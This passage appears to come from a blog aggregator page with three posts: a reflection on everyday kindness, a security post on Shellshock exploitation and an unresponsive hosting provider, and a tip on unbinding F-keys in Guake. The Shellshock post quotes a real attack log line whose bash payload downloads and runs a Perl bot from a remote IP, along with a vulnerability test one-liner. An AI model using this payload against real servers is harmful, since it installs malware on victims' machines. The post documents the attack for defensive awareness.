Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, and yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without so much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach

September 28, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Responsibility in running Internet infrastructure (September 28, 2014, 23:31 UTC)

If you have any interest in IT security you have probably heard of the vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software, it's inevitable that this will have some impact. Machines get owned and abused to send spam, DDoS other people or spread malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run Internet infrastructure in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - besides some scans that were done by researchers. On Saturday I had a look at a few such log entries, from my own servers and from what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is sending an HTTP request where the user agent string, which usually contains the name of the software (e.g. the browser), is set to some malicious code meant to exploit the Bash vulnerability. If successful, it would download a malware script called jurat and execute it. We had obviously already upgraded our Bash installation, so this didn't do anything on our servers. The file jurat contains a Perl script which is a piece of malware called IRCbot.a or Shellbot.B.
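
If you want to check whether a given Bash is still vulnerable to the original issue (CVE-2014-6271), the widely circulated test one-liner is:

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'

A patched Bash prints only "this is a test"; a vulnerable one prints "vulnerable" first, because the function definition smuggled in through the environment variable gets parsed and the trailing command executed.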

For all such logs I checked whether the downloads were still available. Most of them were offline; however, the one presented here was still there. I checked the IP: it belongs to a Dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweeted at them. I tried their live support chat. I could chat with somebody who asked me if I was a customer. He told me that if I wanted to report abuse he couldn't help me; I should write an email to their abuse department. I asked him if he couldn't just tell them himself. He said that was not possible. I wrote an email to their abuse department. Nothing happened.

On Sunday at noon the malware was still online. When I checked again late on Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from every imaginable threat. You can greatly reduce the risk, and we try hard to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is have reasonable crisis management.

When one of the servers you're responsible for is part of a large-scale attack based on a threat that's headlining all the news, I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale on which you take action in such a situation makes the difference between hundreds and millions of infected hosts. Having your hosts serve malware for that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Unblocking F-keys (e.g. F9 for htop) in Guake 0.5.0 (September 28, 2014, 18:36 UTC)

I noticed that I couldn’t kill a process in htop today; F9 did not seem to be working, and actually most of the F-keys did not.

The reason turned out to be that Guake 0.5.0 takes over keys F1 to F10 for direct access to tabs 1 to 10.
That may work for most terminal applications, but for htop it’s a killer.

So how can I prevent Guake from taking F9 over?
The preferences dialog allows me to assign a different key, but not to assign no key at all. Really? There is no context menu, and backspace and delete didn’t help. For now I assume it’s not possible.
So I fire up gconf-editor: menu > Edit > Find… > “guake” — there it is. However, upon “Edit key…”, gconf-editor says to me:

Currently pairs and schemas can’t be edited. This will be changed in a later version.

Very nice.

In the end what did work was to run

gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab9 \
	--type string ''

and to restart Guake.
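
If you want to free all of the F-keys rather than just F9, a small loop should do it, assuming the other bindings follow the same switch_tabN naming (switch_tab9 is the only one I actually tested):

for i in $(seq 1 10); do
    gconftool-2 --set "/schemas/apps/guake/keybindings/local/switch_tab$i" \
        --type string ''
done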

I just opened a bug for this. If you like, you can follow it at https://github.com/Guake/guake/issues/376.